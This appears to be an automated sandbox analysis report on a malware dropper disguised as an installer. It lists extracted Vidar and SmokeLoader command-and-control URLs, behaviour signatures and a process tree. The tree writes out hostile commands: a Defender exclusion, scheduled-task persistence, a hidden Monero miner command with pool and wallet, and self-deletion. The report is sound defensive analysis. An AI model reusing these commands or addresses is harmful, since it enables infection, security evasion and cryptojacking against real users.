Resubmissions

07-09-2021 17:26

210907-vzzaxsdae6 10

07-09-2021 13:18

210907-qkaa2acfe3 10

06-09-2021 17:52

210906-wfz9jsbch4 10

06-09-2021 17:51

210906-wfnwhsbch3 10

06-09-2021 13:27

210906-qp3hdaedaj 10

06-09-2021 09:28

210906-lfpgyaeael 10

06-09-2021 04:33

210906-e6mmpsaaa2 10

05-09-2021 05:25

210905-f4h26sfab6 10

04-09-2021 21:32

210904-1dqdsahfdj 10

04-09-2021 21:19

210904-z56z6shfck 10

Analysis

  • max time kernel
    127s
  • max time network
    1814s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    05-09-2021 05:25

General

  • Target

    setup_x86_x64_install.exe

  • Size

    2.2MB

  • MD5

    e3b3a95ef03de0de77cca7a54ea22c94

  • SHA1

    d318d234f8f27f25de660d9881113df9d11c24ff

  • SHA256

    baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

  • SHA512

    3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d

Malware Config

Extracted

Family

vidar

Version

40.4

Botnet

706

C2

https://romkaxarit.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 45 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 40 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 20 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2424
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1924
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2448
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1448
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1268
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1260
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2652
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
              1⤵
                PID:1108
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2808
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                    PID:2676
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:360
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                      2⤵
                        PID:7508
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          3⤵
                            PID:6380
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:4504
                        • C:\Users\Admin\AppData\Roaming\cheugba
                          C:\Users\Admin\AppData\Roaming\cheugba
                          2⤵
                            PID:5548
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                              PID:8052
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:5908
                              • C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe
                                C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe --Task
                                2⤵
                                  PID:7364
                                  • C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe
                                    C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe --Task
                                    3⤵
                                      PID:4592
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                      PID:3496
                                    • C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe
                                      C:\Users\Admin\AppData\Local\36c14422-e2ea-4d85-ac3e-e47dad4699c3\B883.exe --Task
                                      2⤵
                                        PID:2876
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                      1⤵
                                        PID:984
                                      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                        1⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4956
                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:4456
                                          • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\setup_install.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7zS8616A254\setup_install.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of WriteProcessMemory
                                            PID:4556
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4936
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                5⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:212
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3628
                                              • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri1544861ac3fe6a.exe
                                                Fri1544861ac3fe6a.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:3052
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 772
                                                  6⤵
                                                  • Drops file in Windows directory
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5572
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 796
                                                  6⤵
                                                  • Program crash
                                                  PID:6104
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 816
                                                  6⤵
                                                  • Program crash
                                                  PID:5884
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 828
                                                  6⤵
                                                  • Program crash
                                                  PID:6272
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 956
                                                  6⤵
                                                  • Program crash
                                                  PID:6500
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 988
                                                  6⤵
                                                  • Program crash
                                                  PID:6708
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1044
                                                  6⤵
                                                  • Program crash
                                                  PID:6960
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1420
                                                  6⤵
                                                  • Program crash
                                                  PID:6380
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1456
                                                  6⤵
                                                  • Program crash
                                                  PID:5384
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1368
                                                  6⤵
                                                  • Program crash
                                                  PID:1592
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1580
                                                  6⤵
                                                  • Program crash
                                                  PID:7236
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1416
                                                  6⤵
                                                  • Program crash
                                                  PID:7340
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1472
                                                  6⤵
                                                  • Program crash
                                                  PID:7444
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1388
                                                  6⤵
                                                  • Program crash
                                                  PID:7532
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 1720
                                                  6⤵
                                                  • Program crash
                                                  PID:7668
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 900
                                                  6⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  PID:8096
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4284
                                              • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri156ec98815f89c.exe
                                                Fri156ec98815f89c.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:900
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4804
                                              • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri155442fc38b.exe
                                                Fri155442fc38b.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:1128
                                                • C:\Users\Admin\AppData\Roaming\3699007.exe
                                                  "C:\Users\Admin\AppData\Roaming\3699007.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4616
                                                  • C:\Windows\system32\WerFault.exe
                                                    C:\Windows\system32\WerFault.exe -u -p 4616 -s 1976
                                                    7⤵
                                                    • Program crash
                                                    PID:3944
                                                • C:\Users\Admin\AppData\Roaming\2696018.exe
                                                  "C:\Users\Admin\AppData\Roaming\2696018.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:4112
                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4776
                                                • C:\Users\Admin\AppData\Roaming\2224476.exe
                                                  "C:\Users\Admin\AppData\Roaming\2224476.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4604
                                                • C:\Users\Admin\AppData\Roaming\5636569.exe
                                                  "C:\Users\Admin\AppData\Roaming\5636569.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:960
                                                • C:\Users\Admin\AppData\Roaming\3821949.exe
                                                  "C:\Users\Admin\AppData\Roaming\3821949.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:4832
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3944
                                              • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri15af75ee9b.exe
                                                Fri15af75ee9b.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:1320
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c APPNAME7.exe
                                              4⤵
                                                PID:424
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:584
                                                • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri1553f0ee90.exe
                                                  Fri1553f0ee90.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1292
                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                    6⤵
                                                      PID:4244
                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4744
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                          8⤵
                                                            PID:6732
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                              9⤵
                                                              • Creates scheduled task(s)
                                                              PID:7076
                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                            "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                            8⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:6860
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                              9⤵
                                                                PID:8132
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                  10⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:3572
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:1496
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                9⤵
                                                                  PID:7908
                                                            • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3920
                                                              • C:\Users\Admin\AppData\Roaming\1571782.exe
                                                                "C:\Users\Admin\AppData\Roaming\1571782.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5144
                                                              • C:\Users\Admin\AppData\Roaming\6623347.exe
                                                                "C:\Users\Admin\AppData\Roaming\6623347.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5420
                                                              • C:\Users\Admin\AppData\Roaming\7905267.exe
                                                                "C:\Users\Admin\AppData\Roaming\7905267.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: SetClipboardViewer
                                                                PID:5312
                                                              • C:\Users\Admin\AppData\Roaming\3003059.exe
                                                                "C:\Users\Admin\AppData\Roaming\3003059.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5708
                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:732
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 732 -s 1564
                                                                8⤵
                                                                • Program crash
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4864
                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:588
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 804
                                                                8⤵
                                                                • Program crash
                                                                PID:5984
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 808
                                                                8⤵
                                                                • Program crash
                                                                PID:6236
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 1064
                                                                8⤵
                                                                • Program crash
                                                                PID:6476
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 848
                                                                8⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:6628
                                                            • C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:648
                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4456
                                                              • C:\Users\Admin\AppData\Local\Temp\is-GLTO5.tmp\setup_2.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-GLTO5.tmp\setup_2.tmp" /SL5="$401FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:1848
                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  PID:4276
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-T79K2.tmp\setup_2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-T79K2.tmp\setup_2.tmp" /SL5="$2023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4244
                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      PID:3176
                                                            • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:1296
                                                              • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5696
                                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1832
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4948
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri157e25afd971.exe
                                                          Fri157e25afd971.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:800
                                                          • C:\Users\Admin\AppData\Local\Temp\is-F7LM7.tmp\Fri157e25afd971.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-F7LM7.tmp\Fri157e25afd971.tmp" /SL5="$301EE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8616A254\Fri157e25afd971.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1868
                                                            • C:\Users\Admin\AppData\Local\Temp\is-QGRH7.tmp\zab2our.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-QGRH7.tmp\zab2our.exe" /S /UID=burnerch2
                                                              7⤵
                                                              • Drops file in Drivers directory
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4304
                                                              • C:\Program Files\Internet Explorer\KBLEWSNTDF\ultramediaburner.exe
                                                                "C:\Program Files\Internet Explorer\KBLEWSNTDF\ultramediaburner.exe" /VERYSILENT
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5948
                                                                • C:\Users\Admin\AppData\Local\Temp\is-TTTTR.tmp\ultramediaburner.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-TTTTR.tmp\ultramediaburner.tmp" /SL5="$90062,281924,62464,C:\Program Files\Internet Explorer\KBLEWSNTDF\ultramediaburner.exe" /VERYSILENT
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4768
                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    PID:6456
                                                              • C:\Users\Admin\AppData\Local\Temp\11-bbc85-f79-5ecb2-4c1b89a1a05ec\SHaegudabyso.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\11-bbc85-f79-5ecb2-4c1b89a1a05ec\SHaegudabyso.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                PID:6072
                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                  dw20.exe -x -s 2184
                                                                  9⤵
                                                                    PID:7444
                                                                • C:\Users\Admin\AppData\Local\Temp\cc-b105d-829-73499-35482f2f3dcbc\Pymaesocela.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\cc-b105d-829-73499-35482f2f3dcbc\Pymaesocela.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:2844
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\feamrbvy.uwf\GcleanerEU.exe /eufive & exit
                                                                    9⤵
                                                                      PID:6312
                                                                      • C:\Users\Admin\AppData\Local\Temp\feamrbvy.uwf\GcleanerEU.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\feamrbvy.uwf\GcleanerEU.exe /eufive
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:6900
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\feamrbvy.uwf\GcleanerEU.exe" & exit
                                                                          11⤵
                                                                            PID:7940
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im "GcleanerEU.exe" /f
                                                                              12⤵
                                                                              • Kills process with taskkill
                                                                              PID:8004
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v0nlwxta.kpx\installer.exe /qn CAMPAIGN="654" & exit
                                                                        9⤵
                                                                          PID:6532
                                                                          • C:\Users\Admin\AppData\Local\Temp\v0nlwxta.kpx\installer.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\v0nlwxta.kpx\installer.exe /qn CAMPAIGN="654"
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Enumerates connected drives
                                                                            • Modifies system certificate store
